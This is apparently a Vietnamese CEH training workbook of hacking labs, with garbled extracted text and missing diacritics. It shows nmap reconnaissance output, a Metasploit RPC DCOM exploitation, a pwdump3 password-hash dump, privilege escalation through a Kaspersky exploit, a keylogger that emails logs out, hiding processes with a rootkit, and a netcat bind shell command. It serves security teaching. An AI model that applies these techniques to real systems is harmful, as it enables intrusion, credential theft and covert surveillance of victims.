VanLuong.blogspot.com CEH

7/28/2019 VanLuong.blogspot.com CEH

1/120

Gio trnh bi tp C|EH Ti liu dnh cho hc vin

VSIC Education Corporation Trang 1

Mc Lc

Bi 1:..................................................................................................................................... 3FOOTPRINTING ................................................................................................................ 3

I/ Gii thiu v Foot Print:............................................................................................... 3II/ Cc bi thc hnh: ...................................................................................................... 3Bi 1: Tm thng tin v Domain................................................................................... 3

Bi 2: Tm thng tin email ...........................................................................................5Bi 2:..................................................................................................................................... 7SCANNING..........................................................................................................................7

I/ Gii thiu v Scanning: ............................................................................................... 7II/ Cc Bi thc hnh.......................................................................................................7

Bi thc hnh 1: S dng Phn mm Nmap.................................................................. 7Bi thc hnh th2: S dng phn mm Retina pht hin cc vulnerabilities v tncng bng Metaesploit framework................................................................................ 13

Bi 3:................................................................................................................................... 18SYSTEM HACKING......................................................................................................... 18

I/ Gii thiu System Hacking:....................................................................................... 18II/ Thc hnh cc bi Lab ............................................................................................. 18

Bi 1: Crack password nt b ni b........................................................................ 18Bi 2: Sdng chng trnh pwdump3v2 khi c c 1 user administrator camy nn nhn c th tm c thng tin cc user cn li. ................................... 20Bi Lab 3: Nng quyn thng qua chng trnh Kaspersky Lab ............................ 23Bi Lab 4: Sdng Keylogger................................................................................... 25Bi Lab 5: Sdng Rootkit v xa Log file .............................................................. 27

Bi 4:................................................................................................................................... 30TROJAN v BACKDOOR................................................................................................ 30

I/ Gii thiu v Trojan v Backdoor: ........................................................................... 30II/ Cc bi thc hnh: .................................................................................................... 30

Bi 1 Sdng netcat: ................................................................................................. 30Bi 2: Sdng Trojan Beast v detect trojan. .......................................................... 32Mun s dng Trojan Beast, ta cn phi xy dng 1 file Server ci ln my nn nhn, sau file server ny s lng nghe nhng port cnh v t my tn cng ta s connectvo my nn nhn thng qua cng ny. ........................................................................ 32Bi 3: Sdng Trojan di dng Webbase .............................................................. 35

Bi 5:................................................................................................................................... 38CC PHNG PHP SNIFFER..................................................................................... 38

I/ Gii thiu v Sniffer .................................................................................................. 38Bi 6:................................................................................................................................... 65Tn Cng tchi dch v DoS........................................................................................... 65

I/ Gii thiu: .................................................................................................................. 65

II/ M t bi lab: ............................................................................................................ 67Bi Lab 1: DoS bng cch sdng Ping of death. ................................................... 67Bi lab 2: DoS 1 giao thc khng sdng chng thc(trong bi sdng giao thcRIP)............................................................................................................................. 69Bi Lab 3: Sdng flash DDoS ............................................................................ 72

Bi 7:................................................................................................................................... 74Social Engineering ............................................................................................................. 74

I/ Gii Thiu .................................................................................................................. 74


2/120



II/ Cc bi Lab: .............................................................................................................. 74Bi Lab 1: Gi email nc nh km Trojan .............................................................. 74

Bi 8:................................................................................................................................... 77Session Hijacking ............................................................................................................... 77

I/ Gii thiu: ................................................................................................................... 77II/ Thc hin bi Lab........................................................................................................ 77

Bi 9:................................................................................................................................... 80Hacking Web Server .......................................................................................................... 80I/ Gii thiu: ................................................................................................................... 80II/ Thc Hin bi lab. ....................................................................................................... 80

Bi Lab 1: Tn cng Web Server Win 2003(li Apache) .......................................... 80Bi lab 2: Khai thc li ng dng Server U ............................................................. 84

Bi 10:................................................................................................................................. 85WEB APPLICATION HACKING.................................................................................... 85

I/ Gii thiu: .................................................................................................................. 85II/ Cc Bi Lab ............................................................................................................... 85

Bi Lab 1: Cross Site Scripting.................................................................................. 85Bi Lab 2: Insufficient Data Validation .................................................................... 86Bi Lab 3: Cookie Manipulation ............................................................................... 88Bi Lab 4: Authorization Failure .............................................................................. 89

Bi 11:................................................................................................................................. 91SQL INJECTION .............................................................................................................. 91

I/ Gii thiu v SQL Injection: ...................................................................................... 91II/ Thc Hnh Bi Lab .................................................................................................. 94

Bi 12:............................................................................................................................... 101WIRELESS HACKING .................................................................................................. 101

I/ Gii Thiu ................................................................................................................. 101II/ Thc hnh bi Lab: ................................................................................................ 101

Bi 13:............................................................................................................................... 105VIRUS .............................................................................................................................. 105

I/ Gii thiu: (tham kho bi c thm) ..................................................................... 105II/ Thc hnh Lab: ...................................................................................................... 105

Bi 1: Virus ph hy dliu my ............................................................................ 105Bi 2: Virus gaixinh ly qua tin nhn...................................................................... 107

Bi 14:............................................................................................................................... 111BUFFER OVERFLOW ................................................................................................... 111

I/ L thuyt .................................................................................................................. 111II/ Thc hnh: .............................................................................................................. 118


3/120


4/120



Registrar Name....: BlueHost.Com

Registrar Whois...: whois.bluehost.com

Registrar Homepage: http://www.bluehost.com/

Domain Name: ITVIETNAM.COM

Created on..............: 1999-11-23 11:31:30 GMT

Expires on..............: 2009-11-23 00:00:00 GMT

Last modified on........: 2007-07-30 03:15:11 GMT

Registrant Info: (FAST-12836461)

VSIC Education Corporation


78-80 Nguyen Trai Street,

5 District, HCM City, 70000

Vietnam

Phone: +84.88363691

Fax..:

Email: [email protected]

Last modified: 2007-03-23 04:12:24 GMT

Administrative Info: (FAST-12836461)



78-80 Nguyen Trai Street,

5 District, HCM City, 70000

Vietnam

Phone: +84.88363691

Fax..:

Email: [email protected] modified: 2007-03-23 04:12:24 GMT

Technical Info: (FAST-12785240)

Attn: itvietnam.com

C/O BlueHost.Com Domain Privacy

1215 North Research WaySuite #Q 3500

Orem, Utah 84097

United States

Phone: +1.8017659400

Fax..: +1.8017651992

Email: [email protected]


5/120



Last modified: 2007-04-05 16:50:56 GMT

Status: Locked

Ngoi vic tm thng tin v domain nh trn, chng ta c th s dng cc tin ch

Reverse IP domain lookup c th xem th trn IP ca mnh c bao nhiu host chung vimnh. Vo link sau y s dng tin ch ny.http://www.domaintools.com/reverse-ip/

Vic tm kim c thng tin ny rt cn thit vi Hacker, bi v da vo thng tin sdng chung Server ny, Hacker c th thng qua cc Website b li trong danh sch trn vtn cng vo Server t kim sot tt c cc Website c hosting trn Server.

Bi 2: Tm thng tin emailTrong bi thc hnh ny, chng ta s dng phn mm 1st email address spider

tm kim thng tin v cc email. Hacker c th s dng phn mm ny thu thp thm thngtin v mail, hay lc ra cc i tng email khc nhau, tuy nhin bn c th s dng tool ny thu thp thm thng tin nhm mc ch marketing, v d bn cn tm thng tin ca ccemail c ui l @vnn.vn hay @hcm.vnn.vn phc cho vic marketing sn phm.

Ta c th cu hnh vic s dng trang web no ly thng tin, trong bi ti s dngtrang google.com tm kim.


6/120



Sau nh t kha vnn.vn vo tag keyword

Sau chng ta c c 1 list mail nhs dng trng trnh ny.


7/120



Bi 2:

SCANNING

I/ Gii thiu v Scanning:

Scanning hay cn gi l qut mng l bc khng th thiu c trong qu trnh tncng vo h thng mng ca hacker. Nu lm bc ny tt Hacker s mau chng pht hinc li ca h thng v d nh li RPC ca Window hay li trn phm mm dch v webnh Apache v.v. V t nhng li ny, hacker c th s dng nhng on m c hi(t cctrang web) tn cng vo h thng, ti t nht ly shell.

Phn mm scanning c rt nhiu loi, gm cc phm mm thng mi nh Retina,GFI, v cc phn mm min ph nh Nmap,Nessus. Thng thng cc n bn thng mi cth update cc bug li mi t internet v c th d tm c nhng li mi hn. Cc phnmm scanning c th gip ngi qun tr tm c li ca h thng, ng thi a ra cc gii

php sa li nh update Service patch hay s dng cc policy hp l hn.

II/ Cc Bi thc hnh

Bi thc hnh 1: S dng Phn mm Nmap

Trc khi thc hnh bi ny, hc vin nn tham kho li gio trnh l thuyt v ccoption ca nmap.

Chng ta c th s dng phn mm trong CD CEH v5, hay c th download bn minht t website: www.insecure.org. Phn mm nmap c 2 phin bn dnh cho Win v dnhcho Linux, trong bi thc hnh v Nmap, chng ta s dng bn dnh cho Window.

thc hnh bi ny, hc vin nn s dng Vmware v boot t nhiu hiu hnhkhc nhau nh Win XP sp2, Win 2003 sp1, Linux Fedora Core, Win 2000 sp4,v.v.

Trc tin s dng Nmap do thm th xem trong subnet c host no up v cc portcc host ny m, ta s dng lnh Nmap h xem li cc option ca Nmap, sau thc hinlnh Nmap sS 10.100.100.1-20. V sau c kt qu sau:

C:\Documents and Settings\anhhao>nmap -sS 10.100.100.1-20

Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:27 Pacific Standard

Time

Interesting ports on 10.100.100.1:Not shown: 1695 closed ports

PORT STATE SERVICE

22/tcp open ssh

111/tcp open rpcbind

MAC Address: 00:0C:29:09:ED:10 (VMware)


PORT STATE SERVICE


8/120



7/tcp open echo

9/tcp open discard

13/tcp open daytime

17/tcp open qotd

19/tcp open chargen

23/tcp open telnet42/tcp open nameserver

53/tcp open domain

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

1025/tcp open NFS-or-IIS

1026/tcp open LSA-or-nterm

1027/tcp open IIS

1030/tcp open iad1

2105/tcp open eklogin

3389/tcp open ms-term-serv

8080/tcp open http-proxy

MAC Address: 00:0C:29:59:97:A2 (VMware)


PORT STATE SERVICE

135/tcp open msrpc




MAC Address: 00:0C:29:95:A9:03 (VMware)

Interesting ports on 10.100.100.11:Not shown: 1695 filtered ports

PORT STATE SERVICE


445/tcp open microsoft-dsMAC Address: 00:0C:29:A6:2E:31 (VMware)

Skipping SYN Stealth Scan against 10.100.100.13 because Windows does not support

scanning your own machine (localhost) this way.

All 0 scanned ports on 10.100.100.13 are


9/120



Interesting ports on 10.100.100.16:

Not shown: 1689 closed ports

PORT STATE SERVICE

21/tcp open ftp

25/tcp open smtp

80/tcp open http135/tcp open msrpc


443/tcp open https


1433/tcp open ms-sql-s

MAC Address: 00:0C:29:D6:73:6D (VMware)



PORT STATE SERVICE

135/tcp open msrpc


1000/tcp open cadlock

5101/tcp open admdog

MAC Address: 00:15:C5:65:E3:85 (Dell)

Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds

Trong mng c tt c 7 host, 6 my Vmware v 1 PC DELL. By gibc tip theo tatm kim thng tin v OS ca cc Host trn bng s dng lnh Nmap v -O ip address .

C:\Documents and Settings\anhhao>nmap -vv -O 10.100.100.7 (xem chi tit Nmap qut)


Time

Initiating ARP Ping Scan at 10:46

Scanning 10.100.100.7 [1 port]

Completed ARP Ping Scan at 10:46, 0.22s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 10:46Completed Parallel DNS resolution of 1 host. at 10:46, 0.01s elapsed

Initiating SYN Stealth Scan at 10:46

Scanning 10.100.100.7 [1697 ports]

Discovered open port 1025/tcp on 10.100.100.7





10/120



Completed SYN Stealth Scan at 10:46, 1.56s elapsed (1697 total ports)

Initiating OS detection (try #1) against 10.100.100.7

Host 10.100.100.7 appears to be up ... good.



PORT STATE SERVICE135/tcp open msrpc




MAC Address: 00:0C:29:95:A9:03 (VMware)

Device type: general purpose

Running: Microsoft Windows 2003

OS details: Microsoft Windows 2003 Server SP1

OS Fingerprint:OS:SCAN(V=4.20%D=8/2%OT=135%CT=1%CU=36092%PV=Y%DS=1%G=Y%M=000C

29%TM=46B2187

OS:3%P=i686-pc-windows-

windows)SEQ(SP=FF%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=0)

OS:OPS(O1=M5B4NW0NNT00NNS%O2=M5B4NW0NNT00NNS%O3=M5B4NW0NNT0

0%O4=M5B4NW0NNT0

OS:0NNS%O5=M5B4NW0NNT00NNS%O6=M5B4NNT00NNS)WIN(W1=FAF0%W2=F

AF0%W3=FAF0%W4=F

OS:AF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=N%T=80%W=FAF0%O=M5B4NW0NN

S%CC=N%Q=)T1(R=Y

OS:%DF=N%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD

OS:=0%Q=)T3(R=Y%DF=N%T=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4NW0NNT

00NNS%RD=0%Q=)T4

OS:(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T

=80%W=0%S=Z%A=S+%

OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=

0%Q=)T7(R=Y%DF=N%

OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%TOS=0

%IPL=B0%UN=0%RIP

OS:L=G%RID=G%RIPCK=G%RUCK=G%RUL=G%RUD=G)IE(R=Y%DFI=S%T=80%T

OSI=Z%CD=Z%SI=S%OS:DLI=S)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=255 (Good luck!)

IPID Sequence Generation: Incremental


11/120



OS detection performed. Please report any incorrect results at http://insecure.o

rg/nmap/submit/ .

Nmap finished: 1 IP address (1 host up) scanned in 3.204 seconds

Raw packets sent: 1767 (78.460KB) | Rcvd: 1714 (79.328KB)

Ta c th xem cc figerprinting ti C:\Program Files\Nmap\nmap-os-fingerprints

Tip tc vi nhng my cn li.

C:\Documents and Settings\anhhao>nmap -O 10.100.100.1


Time



PORT STATE SERVICE

22/tcp open ssh

111/tcp open rpcbind

MAC Address: 00:0C:29:09:ED:10 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS details: Linux 2.6.9 - 2.6.12 (x86)Uptime: 0.056 days (since Thu Aug 02 09:34:08 2007)



12/120




rg/nmap/submit/ .


Tuy nhin c 1 s host Nmap khng th nhn din ra nh sau:

C:\Documents and Settings\anhhao>nmap -O 10.100.100.16


Time



PORT STATE SERVICE

21/tcp open ftp

25/tcp open smtp

80/tcp open http135/tcp open msrpc


443/tcp open https


1433/tcp open ms-sql-sMAC Address: 00:0C:29:D6:73:6D (VMware)

No exact OS matches for host (If you know what OS is running on it, see http://i

nsecure.org/nmap/submit/ ).TCP/IP fingerprint:

OS:SCAN(V=4.20%D=8/2%OT=21%CT=1%CU=35147%PV=Y%DS=1%G=Y%M=000C2

9%TM=46B21A94

OS:%P=i686-pc-windows-

windows)SEQ(SP=FD%GCD=2%ISR=10C%TI=I%II=I%SS=S%TS=0)S

OS:EQ(SP=FD%GCD=1%ISR=10C%TI=I%II=I%SS=S%TS=0)OPS(O1=M5B4NW0NNT0

0NNS%O2=M5B

OS:4NW0NNT00NNS%O3=M5B4NW0NNT00%O4=M5B4NW0NNT00NNS%O5=M5B4

NW0NNT00NNS%O6=M5

OS:B4NNT00NNS)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0%W6

=FAF0)ECN(R=Y%DOS:F=Y%T=80%W=FAF0%O=M5B4NW0NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=

O%A=S+%F=AS%RD=0

OS:%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%

DF=Y%T=80%W=FAF0

OS:%S=O%A=S+%F=AS%O=M5B4NW0NNT00NNS%RD=0%Q=)T4(R=Y%DF=N%T=8

0%W=0%S=A%A=O%F=


13/120



OS:R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0

%Q=)T6(R=Y%DF=N%T

OS:=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=80%W=0%S=Z

%A=S+%F=AR%O=%RD=

OS:0%Q=)U1(R=Y%DF=N%T=80%TOS=0%IPL=38%UN=0%RIPL=G%RID=G%RIPCK

=G%RUCK=G%RUL=

OS:G%RUD=G)IE(R=Y%DFI=S%T=80%TOSI=S%CD=Z%SI=S%DLI=S)



rg/nmap/submit/ .


Tuy nhin ta c th nhn din rng y l 1 Server chy dch v SQL v Web Server,by gita s dng lnh Nmap v p 80 sV 10.100.100.16 xc nh version ca IIS.

C:\Documents and Settings\anhhao>nmap -p 80 -sV 10.100.100.16


Time


PORT STATE SERVICE VERSION

80/tcp open http Microsoft IIS webserver 5.0MAC Address: 00:0C:29:D6:73:6D (VMware)

Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://insec

ure.org/nmap/submit/ .


Vy ta c thon c phn nhiu host l Window 2000 Server. Ngoi vic thchnh trn chng ta c th s dng Nmap trace, lu log v.v

Bi thc hnh th2: S dng phn mm Retina pht hin cc vulnerabilities v tn cngbng Metaesploit framework.

Retina ca Ieye l phn mm thng mi(cng nh GFI, shadow v.v ) c th updatecc l hng 1 cch thng xuyn v gip cho ngi Admin h thng c tha ra nhng gii

php x l.By gi ta s dng phn mm Retina d tm li ca my Win 2003

Sp0(10.100.100.6)


14/120



Report t chng trnh Retina:

TOP 20 VULNERABILITIES

The following is an overview of the top 20 vulnerabilities on your network.

Rank Vulnerability Name Count

1. echo service 1

2. ASN.1 Vulnerability Could Allow Code Execution 1

3. Windows Cumulative Patch 835732 Remote 1

4. Null Session 1

5. No Remote Registry Access Available 1

6. telnet service 1

7. DCOM Enabled 1

8. Windows RPC Cumulative Patch 828741 Remote 1

9. Windows RPC DCOM interface buffer overflow 1

10. Windows RPC DCOM multiple vulnerabilities 1

11. Apache 1.3.27 0x1A Character Logging DoS 1


15/120



TOP 20 OPEN PORTS

The following is an overview of the top 20 open ports on your network.

TOP 20 OPERATING SYSTEMS

The following is an overview of the top 20 operating systems on your network.

12. Apache 1.3.27 HTDigest Command Execution 1

13. Apache mod_alias and mod_rewrite Buffer Overflow 1

14. ApacheBench multiple buffer overflows 1

15. HTTP TRACE method supported 1

Rank Port Number Description Count

1. TCP:7 ECHO - Echo 1

2. TCP:9 DISCARD - Discard 1

3. TCP:13 DAYTIME - Daytime 1

4. TCP:17 QOTD - Quote of the Day 1

5. TCP:19 CHARGEN - Character Generator 1

6. TCP:23 TELNET - Telnet 1

7. TCP:42 NAMESERVER / WINS - Host Name Server 1

8. TCP:53 DOMAIN - Domain Name Server 1

9. TCP:80WWW-HTTP - World Wide Web HTTP (Hyper Text

Transfer Protocol)1

10. TCP:135RPC-LOCATOR - RPC (Remote Procedure Call) Location

Service

1

11. TCP:139 NETBIOS-SSN - NETBIOS Session Service 1

12. TCP:445 MICROSOFT-DS - Microsoft-DS 1

13. TCP:1025 LISTEN - listen 1

14. TCP:1026 NTERM - nterm 1

15. TCP:1030 IAD1 - BBN IAD 1

16. TCP:2103 ZEPHYR-CLT - Zephyr Serv-HM Conncetion 1

17. TCP:2105 EKLOGIN - Kerberos (v4) Encrypted RLogin 1

18. TCP:3389 MS RDP (Remote Desktop Protocol) / Terminal Services 119. TCP:8080 Generic - Shared service port 1

20. UDP:7 ECHO - Echo 1


16/120



Nh vy ta xc nh hiu hnh ca my 10.100.100.6, cc Port mca h thngv cc li ca h thng. y l thng tin cn thit ngi Admin nhn din li v v liTrong Top 20 vulnerabilities ta s khai thc bug li th 10 l RPC DCOM bng chng trinhMetaesploit framework(CD CEH v5). Ta c th kim tra cc thng tin li ny trn chnh trangca Ieye hay securityfocus.com, microsoft.com.

Ta s dng giao din console ca Metaesploit tm bug li hp vi chng trnhRetina va qut c.

Rank Operating System Name Count

1. Windows Server 2003 1


17/120



Ta thy c th nhn thy bug li msrpc_dcom_ms03_026.pm c lit k trong phnexploit ca metaesploit. By gita bt u khai thc li ny.

Nh vy sau khi khai thc ta c c shell ca my Win 2003, by gi ta c th

upload backdoor hay ly nhng thng tin cn thit trong my ny(vn ny sc bn nhng chng sau).

Kt lun: Phn mm scanning rt quan trng vi Hacker c th pht hin li ca h thng,sau khi xc nh li Hacker c th s dng Framework c sn hay code c sn trn Internet c th chim quyn s dng ca my mc tiu. Tuy nhin y cng l cng c hu ch caAdmin h thng, phn mm ny gip cho ngi Admin h thng nh gi li mc bo mtca h thng mnh v kim tra lin tc cc bug li xy ra.


18/120



Bi 3:

SYSTEM HACKING

I/ Gii thiu System Hacking:Nh chng ta hc phn l thuyt, Module System Hacking bao gm nhng k

thut ly Username v Password, nng quyn trong h thng, s dng keyloger ly thngtin ca i phng(trong bc ny cng c th Hacker li Trojan, vn hc chngtip theo), n thng tin ca process ang hot ng(Rootkit), v xa nhng log h thng.

i vi phn ly thng tin v username v password Local, hacker c th crack pass

trn my ni b nu s dng phn mm ci ln my , hay s dng CD boot Knoppix lysyskey, bc tip theo l gii m SAM ly hash ca Account h thng. Chng ta c th lyusername v password thng qua remote nh SMB, NTLM(bng k thut sniffer s hc chng sau) hay thng qua 1 Account ca h thng bit(s dng PWdump3)

Vi phn nng quyn trong h thng, Hacker c th s dng l hng ca Window, ccphn mm chy trn h thng nhm ly quyn Admin iu khin h thng. Trong bi thchnh ta khai thc l hng ca Kaberky Lab 6.0 nng quyn t user bnh thng sang userAdministrator trong Win XP sp2.

Phn Keylogger ta s dng SC-keyloger xem cc hot ng ca nn nhn nh gimst ni dung bn phm, thng tin v chat, thng tin v s dng my, thng tin v cc ti khonuser s dng.

Tip theo ta s dng Rootkit n cc process ca keyloger, lm cho ngi admin hthng khng th pht hin ra l mnh ang b theo di. bc ny ta s dng vanquis rootkitn cc process trong h thng. Cui cng ta xa log v du vt xm nhp h thng.

II/ Thc hnh cc bi Lab

Bi 1: Crack password nt b ni b


19/120



Trc tin ta ci phm mm Cain vo my i phng, v s dng phn mm ny d tm password ca user.

Qu trnh Add user

Bt phm mm Cain v chn Import Hashes from local system

y chng ta thy c 3 ch, Import hash from local system, ta s dng fileSAM ca h thng hin ti ly hash ca account(khng c m ha syskey), Option ImportHashes from text file, thng thng text file ny l ly t Pwdump(lu hash ca account hthng di dng khng b m ha), Option th 3 l khi chng ta c syskey v file SAM b mha bi syskey. Ca ba trng hp nu nhp y thng tin chng ta u c th c hash caaccount khng b m ha bi syskey. Da vo thng tin hash ny phn mm s brute force tm kim password ca account.

Trong bi ta chn user haovsic, v chn Brute force theo NTLM hash. Sau khi chnch ny ta thy PC bt u tnh ton v cho ra kt qu.


20/120



Bi 2: Sdng chng trnh pwdump3v2 khi c c 1 user administrator camy nn nhn c th tm c thng tin cc user cn li.


21/120



My ca nn nhn s dng Window 2003 sp0, v c sn user quyen password lcisco, by gida vo account ny, ta c th tm thm thng tin ca nhng account khctrong my.

Trc tin ta s dng pwdump3.exe xem cc tham s cn nhp vo. Sau sdng lnh pwdump3.exe 10.100.100.6 c;\hao2003sp0 quyen, v nhp vo password causer quyen.

Ta mfile hao2003sp0 xem trong thng tin.aaa:1015:NO PASSWORD*********************:NO

PASSWORD*********************:::

anhhao:1010:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782

BBD9D5E18:::

anhhao1:1011:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782

BBD9D5E18:::

anhhao2:1013:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782

BBD9D5E18:::

anhhaoceh:1019:B26C623F5254C6A311F64391B17C6CDE:98A2C048C77703D54BD0E88

887EFD68E:::

ASPNET:1006:7CACBCC121AC203CD8652FE65BEA4486:7D34A6E7504DFAF453D421

3660AE7D35:::

Guest:501:NO PASSWORD*********************:NO

PASSWORD*********************:::hack:1022:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12

283678:::

hacker:1018:BCE739534EA4E445AAD3B435B51404EE:5E7599F673DF11D5C5C4D950F

5BF0157:::

hao123:1020:58F907D1C79C344DAAD3B435B51404EE:FD03071D41308B58B9DDBC6D

5576D78D:::


22/120



haoceh:1016:B3FF8763A6B5CE26AAD3B435B51404EE:7AD94985F28454259BF2A03821

FEC8DB:::

hicehclass:1023:B2BEF1B1582C2DC0AAD3B435B51404EE:D6198C25F8420A93301A579

2398CF94C:::

IUSR_113-

SSR3JKXGW3N:1003:449913C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F483

3ABFA52ADA9462:::

IWAM_113-

SSR3JKXGW3N:1004:4431005ABF401D86F92DBAC26FDFD3B8:188AA6E0737F12D16

D60F8B64F7AE1FA:::

lylam:1012:EE94DC327C009996AAD3B435B51404EE:7A63FB0793A85C960A775497C9

D738EE:::

quyen:500:A00B9194BEDB81FEAAD3B435B51404EE:5C800F13A3CE86ED2540DD4E7331E9A2:::SUPPORT_388945a0:1001:NO

PASSWORD*********************:F791B19C488F4260723561D4F484EA09:::

tam:1014:NO PASSWORD*********************:NOPASSWORD*********************:::

test:1017:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B8

9537:::

vic123:1021:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB

12283678:::

Ta thy thng tin user quyen c ID l 500, y l ID ca user administrator trongmng, v user Guest l 501. Ngoi thng tin trn, ta c thm thng tin v pash hash ca user,

by gita s dng chng trnh Cain tm kim thng tin v password ca cc user khc.

S dng Brute Force Attack vi user hiclassceh v tm ra password l 1234a.Password ny ch c 5 k t v d dng b Brute Force, tuy nhin i vi nhng password l


23/120



stong password (password bao gm ch hoa v thng, k t, s, k tc bit) th s luhn.

Bi Lab 3: Nng quyn thng qua chng trnh Kaspersky Lab

i vi vic nng quyn trong mt h thng hacker phi li dng l hng no ,hoc l t hiu hnh, hoc l t nhng phn mm ca hng th 3, trong trng hp ny,chng ta nng quyn thng qua phn mm dit Virus l Kaspersky Lab. chun b bi labny, chng ta ln trang web www.milw0rm.com tm thng tin von m khai thc ny.

Sau ta s dng on code ny bin dch thy file exe tn cng vo my nnnhn. thc hnh bi Lab, ta cn phi ci phn mm Kaspersky vo my. Sau khi ci xongta thm vo my 1 user bnh thng,v tin hnh log on vo user ny, Trong bi ta s dnguser hao v password l hao.


24/120



Chy file exe c bin dch exploit vo Kaspersky ang chy di quynadmin h thng.

S dng lnh telnet 127.0.0.1 8080 truy xut vo shell c quyn admin hthng. Ta tip tc s dng lnh Net Localgroup administrators hao /add add user haovo nhm admin, v s dng lnh net user ti xc nhn

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

D:\WINDOWS\system32>

D:\WINDOWS\system32>net Localgroup administrators hao /add

net Localgroup administrators hao /add

The command completed successfully.

D:\WINDOWS\system32>net user hao

net user hao

User name hao

Full Name

Comment

User's comment

Country code 000 (System Default)

Account active Yes

Account expires Never

Password last set 8/3/2007 1:47 PM

Password expires 9/15/2007 12:35 PM

Password changeable 8/3/2007 1:47 PM

Password required Yes


25/120



User may change password Yes

Workstations allowed All

Logon script

User profile

Home directoryLast logon 8/3/2007 1:54 PM

Logon hours allowed All

Local Group Memberships *Administrators *UsersGlobal Group memberships *None

The command completed successfully.

D:\WINDOWS\system32>

Ta thy user hao by gi c quyn Admin trong h thng, v vic nng quyn thnh cng. Cc bn c th test nhng phn mm tng t t code down t trangwww.milw0rm.com.

Bi Lab 4: Sdng KeyloggerTrong bi lab ny, ta s dng phn mm SC Keylogger thu thp thng tin t my

ca nn nhn, vic phi lm phi to ra file keylog, chn mail server relay, ci vo nn nhn.

Sau khi ci phn mm ti file keylogger, by gi ta bt u cu hnh cho sn phmkeylogger ca mnh. u tin ta chn hnh ng c ghi log file bao gm ghi keyboard,

Mouse, v chng trnh chy.


26/120



Tip theo ta chn thng tin email m my nn nhn s gi logfile ny. Thng tin nyc gi 10 pht 1 ln.

Tip theo ta cu hnh mail server relay, v thng tin v process hin th, phn nyhacker thng thng s dng nhng tn ging vi nhng service c sn trn Window nhsvchost.exe,csrss.exev.v nh la ngi admin. d nhn dng ta chn tn file lcehkeylogger.

Sau khi to xong keylogger, ta chy n trn my nn nhn. Ta chn 1 my Win XPno chy chng trnh ny v gi s sau nh on text sau:


27/120



i khong 10 pht ta s thy logfile c gi v nh sau:

>> C:\WINDOWS\system32\notepad.exe

> Chuc lopSecCEH manh khoe, va nhieu thanh dat..

> Chuc lop CEH hoc gioi>::::::::::

> ms

>

C:\WINDOWS\system32\mspaint.exe

Theo nh trn, chng ta c th thy keyloger c th lu li hu nh ht tt c thng tintrn PC ca my nn nhn, c bit l cc thng tin nhy cm nh th tn dng, account, v.v.

Ngi vit khuyn co cc bn s dng kin thc vi mc ch nghin cu, khng s dngchng trnh ny vi mc ch xu.

Bi Lab 5: Sdng Rootkit v xa Log file

Rootkit l chng trnh lm n s hot ng ca keylogger, trojan, lm cho admin hthng kh khn trong vic pht hin. Trong bi thc hnh ta s dng Fu Rootkit n processca keylogger ta ci bi trc, ta s dng lnh tasklist xem cc process chy trong

my tnh.


28/120



Nh ta thy trn hnh, proccess ca cehkeyloger.exe c PID l 1236, by gita s lnprocess ny bng lnh fu ph 1236 v th xem li cc process bng lnh tasklist.


29/120



Ta thy keylogger bin mt khi tasklist, lc ny mun detect c chnh xcngi admin nn s dng trng trnh antivirus, kim sot truy nhp v chy nhng chngtrnh kim tra rootkit trong my nh rootkit detector.


30/120



Bi 4:

TROJAN v BACKDOOR

I/ Gii thiu v Trojan v Backdoor:

Trojan v Backdoorc s dng gim st my nn nhn, v l ca sau Hacker c thvo li h thng my tnh thng qua cng kt ni(port), thng qua mi trng Web(webase).Loi s dng cng kt ni ta thng thy l netcat, beast, Donald Dick v.v. V loi s dngmi trng Webbase thng thng l r57,c99, zehir4v.v. c tnh ca Trojan kt ni port lmi ln kt ni phi m cng, v admin tng i pht hin d dng hn so vi loiWebbase(thng thng tn cng Web Server). Trong bi thc hnh, chng ta ci th cctnh nng ca netcat, beast, c99, zehir4 v phn tch 1 don code mu trojan.

II/ Cc bi thc hnh:

Bi 1 Sdng netcat:

1/Sdng netcat kt ni shell

Trn my tnh ca nn nhn, bn khi ng netcat vo ch lng nghe, dng ty chn l(listen) v -p port xc nh s hiu cng cn lng nghe, -e yu cu netcat thi hnh 1 chng trnh khi c 1 kt ni n, thng l shell lnh cmd.exe(i vi NT) hoc bin/sh (i vi Unix).

E:\>nc -nvv -l -p 8080 -e cmd.exe

listening on [any] 8080 ...

connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159

sent 0, rcvd 0: unknown socket error

- trn my tnh dng tn cng, bn ch vic dng netcat ni n my nn

nhn trn cng nh, chng hn nh 8080

C:\>nc -nvv 172.16.84.2 8080

